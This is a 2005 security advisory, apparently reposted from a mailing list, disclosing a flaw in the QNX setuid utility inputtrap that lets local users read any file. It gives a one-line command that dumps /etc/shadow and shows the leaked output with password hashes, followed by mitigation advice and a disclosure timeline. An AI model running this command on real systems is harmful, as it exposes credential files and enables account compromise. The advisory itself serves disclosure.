Back to list
[RLSA_01-2005] QNX inputtrap arbitrary file read vulnerability
Aug 24 2005 02:25PM
julio rfdslabs com br
*** rfdslabs security advisory ***
Title: QNX inputtrap arbitrary file read vulnerability [RLSA_01-2005]
Versions: QNX RTOS 6.3, 6.1.0 (possibly others)
Date: Feb 22 2005
Author: Julio Cesar Fort <julio *NO_SPAM* rfdslabs com br>
inputtrap is a utility designed to detect and start input manager in QNX.
inputtrap has a '-t' flag to specify the trap file to be read. Due to impro-
per permissions checking, we have administrative access to read files anywhere
in the disk in addition with 'start' flag.
The following simple command will show us /etc/shadow:
$ inputtrap -t /etc/shadow start
options: Unable to lookup root:21QjUKxP9gEJK:0:0:0 in modules table
options: Unable to lookup sandimas:91UzHxvt3x1n2:0:0:0 in modules table
PS: This "design error" problem is similar to an old Debian 1.1 DOSEmu vulnera-
bility, back in 1999. And it was, surely, erradicated in crucial programs
of most operating systems.
No official solution yet. We suggest remove inputtrap suid bit or change its
permissions to a trusted group of users until QNX doesn't release an official
22 Feb 2005: Vulnerability detected (in a very very boring day, ill at home);
09 Jun 2005: Advisory sent to QNX;
10 Jun 2005: QNX contacted rfdslabs;
24 Aug 2005: Advisory sent to security mailing lists.
Thanks to Lucien Rocha, Carlos Barros (barrossecurity.com), George Fleury,
Rodrigo Costa (NERV), Despise, gotfault.org and everyone at rfdslabs.
www.rfdslabs.com.br - computers, sex, human mind, music and more
Recife, PE, Brazil
[ reply ]
Copyright 2010, SecurityFocus